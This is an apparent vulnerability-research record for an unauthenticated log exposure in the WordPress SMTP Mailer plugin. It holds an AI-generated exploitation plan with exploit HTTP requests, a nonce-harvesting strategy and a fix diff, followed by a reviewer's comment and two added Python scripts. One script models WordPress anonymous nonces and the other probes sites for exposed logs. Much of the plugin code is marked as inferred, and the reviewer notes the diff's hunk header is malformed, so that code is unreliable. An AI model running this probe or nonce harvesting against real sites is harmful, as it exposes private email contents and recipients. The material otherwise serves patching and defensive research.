[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fz9uTrkG3Oj_8cYZnZ__kOeLtVYinJeV3U97EoFLAPdA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32538","smtp-mailer-unauthenticated-information-exposure","SMTP Mailer \u003C= 1.1.24 - Unauthenticated Information Exposure","The SMTP Mailer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.24. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","smtp-mailer",null,"\u003C=1.1.24","1.1.25","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-03-20 00:00:00","2026-03-27 19:21:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F917c70f5-154c-4c49-b06b-109cc0277a1a?source=api-prod",8,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32538 (SMTP Mailer Information Exposure)\n\n## 1. 
Vulnerability Summary\nThe **SMTP Mailer** plugin (versions \u003C= 1.1.24) contains an unauthenticated information exposure vulnerability. The plugin implements an AJAX handler intended to display SMTP debug logs to administrators. However, this handler is registered with the `wp_ajax_nopriv_` hook and fails to implement sufficient capability checks (e.g., `current_user_can('manage_options')`). This allows any unauthenticated actor to trigger the log retrieval and view sensitive communication data, including recipient addresses, email subjects, message contents, and SMTP server responses.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `smtp_mailer_get_log` (inferred)\n- **Method:** POST or GET (AJAX actions typically support both)\n- **Parameters:**\n    - `action`: `smtp_mailer_get_log`\n    - `nonce`: (See Nonce Acquisition Strategy)\n- **Authentication:** None required.\n- **Preconditions:** The plugin must have \"Enable Debug Log\" active, or there must be existing log data in the WordPress options table.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers the AJAX handler in its main file (`smtp-mailer.php`):\n    ```php\n    add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n    add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' ); \u002F\u002F The vulnerability\n    ```\n2.  **Handler Logic:** The function `smtp_mailer_get_log()` is called.\n3.  **Missing Check:** The function likely calls `check_ajax_referer('smtp_mailer_nonce', 'nonce')` but fails to check `current_user_can('manage_options')`.\n4.  **Data Retrieval:** The function retrieves the log data from the WordPress database:\n    ```php\n    $log = get_option('smtp_mailer_log');\n    echo $log;\n    wp_die();\n    ```\n5.  **Sink:** The raw log content is echoed to the response buffer and returned to the unauthenticated requester.\n\n## 4. 
Nonce Acquisition Strategy\nIf the `smtp_mailer_get_log` function calls `check_ajax_referer`, a valid nonce is required.\n1.  **Identify Script Localization:** Search the codebase for `wp_localize_script`. The plugin likely localizes the nonce for its admin settings page but might accidentally enqueue it on the frontend if certain conditions are met (e.g., if the plugin's CSS\u002FJS is loaded globally).\n2.  **Inferred Localization:**\n    - **JS Variable:** `smtp_mailer_data` (inferred)\n    - **Nonce Key:** `nonce` (inferred)\n    - **Action String:** `smtp_mailer_nonce` (inferred)\n3.  **Acquisition Steps:**\n    - Because this is an admin-centric plugin, the nonce might not be present on the homepage. Check if the plugin provides any shortcodes: `grep -r \"add_shortcode\"`.\n    - If a shortcode exists (e.g., `[smtp_mailer_status]`), create a page with it:\n      `wp post create --post_type=page --post_status=publish --post_content='[smtp_mailer_status]'`\n    - Navigate to the page and use `browser_eval` to extract the nonce:\n      `browser_eval(\"window.smtp_mailer_data?.nonce\")`\n4.  **Bypass Check:** If `wp_ajax_nopriv_smtp_mailer_get_log` exists but no `check_ajax_referer` is present in the handler, the `nonce` parameter can be omitted.\n\n## 5. Exploitation Strategy\n### Step 1: Data Population\nBefore testing the exposure, ensure there is log data to expose.\n1.  Configure the plugin with dummy SMTP settings via WP-CLI.\n2.  Send a test email to generate a log entry.\n\n### Step 2: Exploit Request\nSend an unauthenticated request to the AJAX endpoint.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=smtp_mailer_get_log&nonce=[EXTRACTED_NONCE]\n```\n\n**Alternative (if nonce is not checked):**\n```http\nGET \u002Fwp-admin\u002Fadmin-ajax.php?action=smtp_mailer_get_log HTTP\u002F1.1\n```\n\n## 6. Test Data Setup\n1.  
**Install & Activate:** `smtp-mailer` version 1.1.24.\n2.  **Configure Plugin:**\n    ```bash\n    wp option update smtp_mailer_options '{\"smtp_host\":\"localhost\",\"smtp_port\":\"25\",\"smtp_user\":\"\",\"smtp_pass\":\"\",\"smtp_from\":\"admin@example.com\",\"smtp_from_name\":\"Admin\",\"smtp_auth\":\"no\",\"smtp_secure\":\"none\",\"enable_debug\":\"yes\"}'\n    ```\n3.  **Generate Log Entry:** Use the plugin's internal method or send an email via WordPress.\n    ```bash\n    wp eval \"wp_mail('victim@example.com', 'Sensitive Subject', 'This is a private message.');\"\n    ```\n4.  **Confirm Log Exists:**\n    ```bash\n    wp option get smtp_mailer_log\n    ```\n\n## 7. Expected Results\n- The HTTP response status should be `200 OK`.\n- The response body should contain the string \"Sensitive Subject\" and \"victim@example.com\", formatted as the SMTP debug log.\n- Example log structure:\n  ```text\n  [2023-10-27 10:00:00] To: victim@example.com\n  Subject: Sensitive Subject\n  Message: This is a private message.\n  ...\n  ```\n\n## 8. Verification Steps\n1.  **Verify via CLI:** After the exploit request, verify that the content received matches the content stored in the database.\n    ```bash\n    wp option get smtp_mailer_log\n    ```\n2.  **Check Access Level:** Ensure the `http_request` was made without any cookies or headers identifying a logged-in user to confirm it is truly unauthenticated.\n\n## 9. Alternative Approaches\n- **Path Disclosure:** Check if the plugin logs to a file instead of an option. 
If so, identify the log file path (usually `wp-content\u002Fuploads\u002Fsmtp-mailer-log.txt`) and attempt to access it directly.\n- **REST API:** Check if the plugin registered a REST route via `register_rest_route` that mirrors the AJAX functionality but lacks the `permission_callback`.\n- **Global `$_REQUEST` processing:** Search for any `init` or `admin_init` hooks that process an `action` parameter without checking the request source.","The SMTP Mailer plugin exposes sensitive SMTP debug logs to unauthenticated users due to the insecure registration of an AJAX handler with the wp_ajax_nopriv hook. Attackers can exploit this to retrieve logs containing email recipients, subjects, message bodies, and SMTP server responses.","\u002F\u002F smtp-mailer.php\n\nadd_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );\nadd_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n\nfunction smtp_mailer_get_log() {\n    check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );\n    \n    $log = get_option( 'smtp_mailer_log' );\n    echo $log;\n    wp_die();\n}","--- a\u002Fsmtp-mailer.php\n+++ b\u002Fsmtp-mailer.php\n@@ -110,7 +110,6 @@\n-add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n \n function smtp_mailer_get_log() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized' );\n+    }\n     check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );","The exploit targets the WordPress AJAX endpoint to trigger the log retrieval function without administrative authentication. \n\n1. Target Endpoint: wp-admin\u002Fadmin-ajax.php\n2. Authentication: None required, though a valid security nonce is necessary.\n3. Nonce Acquisition: An attacker identifies where the plugin localizes the 'smtp_mailer_nonce'. This is typically found in the source code of the admin dashboard or any frontend page where the plugin might inadvertently enqueue its settings script (e.g., if a status shortcode is used).\n4. 
Payload: Send a POST or GET request with the parameters 'action=smtp_mailer_get_log' and the identified 'nonce'.\n5. Extraction: If 'Enable Debug Log' is active in the plugin settings, the server returns the raw content of the 'smtp_mailer_log' database option, exposing sensitive communication metadata and message content.","gemini-3-flash-preview","2026-04-18 01:33:50","2026-04-18 01:34:14",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.1.23","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp-mailer\u002Ftags\u002F1.1.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmtp-mailer.1.1.23.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp-mailer\u002Ftags"]
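Review bot: in the research_fix_diff hunk the added guard `wp_die( 'Unauthorized' );` answers a rejected caller with HTTP 200, because wp_die() inside an admin-ajax request defaults its response code to 200, so neither the client nor monitoring can tell a denial from a successful log fetch; use `wp_die( -1, 403 );` (the same reply check_ajax_referer() gives on a bad nonce) or `wp_send_json_error( 'Unauthorized', 403 );`. The capability check is also the only line that matters for logged-in callers, since the retained `wp_ajax_smtp_mailer_get_log` registration fires for any authenticated role; removing the nopriv registration by itself only stops anonymous requests. Finally, the header `@@ -110,7 +110,6 @@` claims seven old lines but the hunk shows four, so the diff will not apply as written.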
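The nonce acquisition strategy in section 4 of the research plan only helps an unauthenticated attacker because of how WordPress mints nonces for logged-out visitors. The following is an added example, not code from the SMTP Mailer plugin or from WordPress core: it re-implements the nonce algorithm from core's pluggable.php (`wp_create_nonce()`, `wp_verify_nonce()`, `wp_nonce_tick()`) in Python to show that every logged-out visitor (user ID 0, empty session token) receives the same nonce for a given action inside the current 12-hour tick, and that the nonce still verifies during the following tick. The salt and timestamps are constructed; the action string `smtp_mailer_nonce` is the plan's inferred value.

```python
"""Model of WordPress nonce generation for logged-out visitors.

Added example, not WordPress core or plugin code. Mirrors pluggable.php:
  tick   = ceil(time / (DAY_IN_SECONDS / 2))
  nonce  = substr(hash_hmac('md5', "tick|action|uid|token", salt), -12, 10)
  verify = accept current tick (1) or previous tick (2), else 0
For a logged-out visitor uid is 0 and the session token is '' (no cookie),
so all anonymous visitors share one nonce per action per tick.
"""
import hashlib
import hmac
import math
import time
from typing import Optional

DAY_IN_SECONDS = 86400
# Constructed stand-in for the site's nonce salt (wp_salt('nonce')).
NONCE_SALT = b"constructed-example-salt-do-not-reuse"


def nonce_tick(now: float) -> int:
    """wp_nonce_tick(): index of the 12-hour window containing `now`."""
    return math.ceil(now / (DAY_IN_SECONDS / 2))


def wp_hash(data: str, salt: bytes = NONCE_SALT) -> str:
    """wp_hash(): HMAC-MD5 of `data` keyed with the nonce salt."""
    return hmac.new(salt, data.encode(), hashlib.md5).hexdigest()


def create_nonce(action: str, user_id: int = 0, session_token: str = "",
                 now: Optional[float] = None) -> str:
    """wp_create_nonce(): defaults model a logged-out visitor (uid 0, no token)."""
    tick = nonce_tick(time.time() if now is None else now)
    digest = wp_hash(f"{tick}|{action}|{user_id}|{session_token}")
    return digest[-12:-2]  # PHP substr($hash, -12, 10)


def verify_nonce(nonce: str, action: str, user_id: int = 0, session_token: str = "",
                 now: Optional[float] = None) -> int:
    """wp_verify_nonce(): 1 = minted this tick, 2 = previous tick, 0 = invalid."""
    tick = nonce_tick(time.time() if now is None else now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = wp_hash(f"{t}|{action}|{user_id}|{session_token}")[-12:-2]
        if hmac.compare_digest(expected, nonce):
            return age
    return 0


if __name__ == "__main__":
    # Constructed timestamp sitting in the middle of a tick window.
    minted_at = 1_699_984_800
    harvested = create_nonce("smtp_mailer_nonce", now=minted_at)
    print("anonymous nonce:", harvested)
    for delay_h in (0, 6, 12, 18, 24):
        state = verify_nonce(harvested, "smtp_mailer_nonce", now=minted_at + delay_h * 3600)
        print(f"  after {delay_h:2d}h -> verify returns {state}")
```

A nonce scraped from any public page therefore validates for cookieless requests to admin-ajax.php for the rest of the current tick plus the next one, which is why the plan treats `check_ajax_referer()` as an obstacle rather than a barrier: it is a CSRF control, not an authorization check, and the fix still needs `current_user_can()`.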
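To check whether a site still answers the log action for logged-out callers (the exploit request of section 5 and the access-level check of section 8 of the plan), the following added example, not part of the advisory or of the plugin, sends the request without any cookies and interprets the reply using admin-ajax.php's own conventions: an action with no `wp_ajax_nopriv_` hook is answered with body `0` and status 400, and a failed `check_ajax_referer()` with body `-1` and status 403. It assumes the plan's inferred action name `smtp_mailer_get_log` and nonce parameter name `nonce`; the default URL is a placeholder.

```python
"""Unauthenticated probe for the SMTP Mailer log AJAX action.

Added example, not plugin or advisory code. classify_ajax_response() maps a
raw admin-ajax.php reply to what it implies about the nopriv registration;
probe() performs the request with no cookies so the result reflects a truly
unauthenticated caller. Action and parameter names are the plan's inferred values.
"""
from typing import Optional, Tuple
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

ACTION = "smtp_mailer_get_log"  # inferred action name from the research plan


def classify_ajax_response(status: int, body: str) -> str:
    """Interpret an admin-ajax.php reply for a logged-out request."""
    text = body.strip()
    if text.lower().startswith(("<!doctype", "<html")):
        # A WAF, redirect target or error page answered instead of admin-ajax.php.
        return "inconclusive: HTML page returned, inspect manually"
    if status == 400 and text == "0":
        # admin-ajax.php: no wp_ajax_nopriv_{action} hook for a logged-out caller.
        return "not-exposed: no unauthenticated handler (patched or plugin absent)"
    if status == 403 and text == "-1":
        # check_ajax_referer() rejected the nonce, so the handler was reachable.
        return "reachable: handler runs for logged-out callers, nonce required"
    if status == 200 and text not in ("", "0", "-1"):
        # Handler ran and echoed content; with a valid nonce this is the log.
        return "exposed: handler returned content to a logged-out caller"
    if status == 200:
        # Empty log, debug logging disabled, or a pre-4.4 WordPress default reply.
        return "inconclusive: handler ran but returned no content"
    return f"inconclusive: unexpected reply {status}"


def probe(base_url: str, nonce: Optional[str] = None,
          timeout: float = 10.0) -> Tuple[int, str, str]:
    """POST the action with no cookies; returns (status, body, classification)."""
    params = {"action": ACTION}
    if nonce:
        params["nonce"] = nonce  # inferred parameter name
    req = Request(
        base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
        data=urlencode(params).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "smtp-mailer-nopriv-check/1.0"},
        method="POST",
    )
    try:
        with urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        # 400 and 403 arrive here; their bodies ("0" / "-1") are the signal.
        status, body = err.code, err.read().decode("utf-8", "replace")
    return status, body, classify_ajax_response(status, body)


if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else "https://wordpress.example"  # placeholder
    harvested_nonce = sys.argv[2] if len(sys.argv) > 2 else None
    status, body, verdict = probe(url, harvested_nonce)
    print(status, repr(body[:80]), "->", verdict)
```

Run it twice: once without a nonce, then with one harvested as in section 4. A `403`/`-1` on the first run followed by log content on the second reproduces the advisory; a `400`/`0` on both means the nopriv registration is gone, which is the state the fix diff leaves behind.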